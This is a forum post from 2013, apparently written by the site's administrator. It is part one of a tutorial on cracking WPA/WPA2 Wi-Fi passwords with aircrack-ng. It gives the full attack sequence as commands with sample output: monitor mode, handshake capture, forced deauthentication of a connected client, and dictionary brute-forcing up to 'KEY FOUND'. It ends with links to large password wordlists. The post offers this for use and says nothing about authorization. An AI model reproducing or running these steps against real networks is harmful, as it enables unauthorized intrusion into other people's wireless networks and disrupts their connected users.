mk Administrators
Posts : 276 Join date : 2013-01-19 Age : 33
| Subject: Cracking wpa/wpa2 networks [ part-1 : Bruteforcing through Aircrack-ng] Mon Jan 21, 2013 11:44 pm | |
| Cracking wpa/wpa2 networks [ part-1 : Bruteforcing through Aircrack-ng] Note: This is part 1 of the tutorial covering bruteforcing technique to crack wpa/wpa2 networks. Part 2 is going to cover cracking wpa/wpa2 without bruteforcing, so stay updated with our forum . The tools required for this tutorial are provided at the bottom of this tutorial. This tutorials will teach you about cracking wpa/wpa2 networks which is using pre-shared keys. But before jumping directly to the tutorial, iguess u guys should know about WPA/WPA2 andthe difference between WEP and WPA, if u dont have any ideas on this topic, then i would suggest you to read some articles about WPA/WPA2 and WEP, thats going to help you a lot. Before starting make sure airodump-ng shows the network having PSK authentication type, if not then stop ur time wasting cracking because aircrack-ng can only crack pre-shared keys. I also got asked several times whether we can crack WPA like WEP and the answer i gave was NO, because while cracking WEP, stastistical method can be used to speed op cracking, but WPA only depends upon BRUTE-FORCING ( There's an exception though, which i will be showing on Part-2 of cracking wpa/wpa2 networks) . So here is the points you should note down:
1) The passphrase or password must be in the dicitionary list u are going to use for Brute-forcing. 2) The authentication method between WPA and WPA2 networks are almost same, so there isno difference between cracking WPA and WPA2. 3) You should be close enough to the network to send and receive wireless client packets. The steps we are going to Follow are : Put wireless interface in monitor mode Start airodump-ng to collect authentication Handshake. Use aireplay-ng, to deauthenticate the wireless client, after the handshake is captured. Crack the key using a dictionary file by running aircrack-ng. Putting wireless interface in monitor mode Put card in monitor mode, run the following command. Quote: Quote: airmon-ng Then the system will show this,
Quote: Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) ath1 Atheros madwifi-ng VAP (parent: wifi0) wlan0 Ralink 2573 USB rt73usb - [phy0] Enter following command to start wireless card on monitor mode.(For mac drivers ) Quote: airmon-ng start wlan0 Then the system will respond, Quote: Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) ath1 Atheros madwifi-ng VAP (parent: wifi0) wlan0 Ralink 2573 USB rt73usb - [phy0] (monitor mode enabled on mon0) Enter following command to start wireless card on monitor mode.(For other drivers) Quote: airmon-ng start ardha Replace ardha with your interface name. Now, finding network using WPA/WPA2
Here on above step, monitor mode has been enabled on mon0, note down ur monitor enabled. Then enter Following command, (replace mon0 with ur monitor enabled) Quote: airodump-ng mon0 The system will respond, Quote: CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet BSSID STATION PWR Rate Lost Packets Probe 00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230 In the screen above, notice the “WPA handshake: 00:19:5B:52:AD:F7” in the top right-hand corner. This means airodump-ng has successfully captured the four-way handshake. Now, lets de-authenciate using aireplay-ng afterthe handshake is complete. Quote: aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0 The output should be, Quote: 13:04:20 Sending DeAuth to station. STMAC: [00:1C:BF:90:5B:A3] Now, lets run aircrack-ng to to crack pre-shared Key . Quote: aircrack-ng –w mypassword.lst -b 00:19:5B:52:AD:F7 psk*.cap Where: -w mypassword.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory. *.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files. If everything is working good and handshakes are found, this is what u are likely to get Quote: Opening psk-01.cap Opening psk-02.cap Opening psk-03.cap Opening psk-04.cap Read 1827 packets. # BSSID ESSID Encryption 1 00:19:5B:52:AD:F7 testnet WPA (1 handshake) Choosing first network as target. If handshakes are not found then, Quote: Opening psk-01.cap Opening psk-02.cap Opening psk-03.cap Opening psk-04.cap Read 1827 packets. No valid WPA handshakes found. Now , aircrack-ng will start attempting to crack the pre-shared key. Depending on ur computer speed and size of password file, cracking may take upto hours and even days. If everything goes good then this is what cracked pre-shared key looks like: Aircrack-ng 0.8 Quote: [00:00:00] 2 keys tested (37.20 k/s) KEY FOUND! [ 12345678 ] Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 5985 7D 49 3E B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98 CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40 FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E 2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71 EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB And, thats end of the Tutorial. Download aircrack from : [You must be registered and logged in to see this link.] Collection of wordlist(size:8.49gb) : [You must be registered and logged in to see this link.] Collection of wordlist(size:1.9gb) : filesonic.com /folder/13545931 OR, you can use your own wordlists, if u already have one. Note: This is part 1 of the tutorial covering bruteforcing techniquq to crack wpa/wpa2 networks. Part 2 is going to cover cracking wpa/wpa2 without bruteforcing, so stay updated with our Forum. Copyright | |
|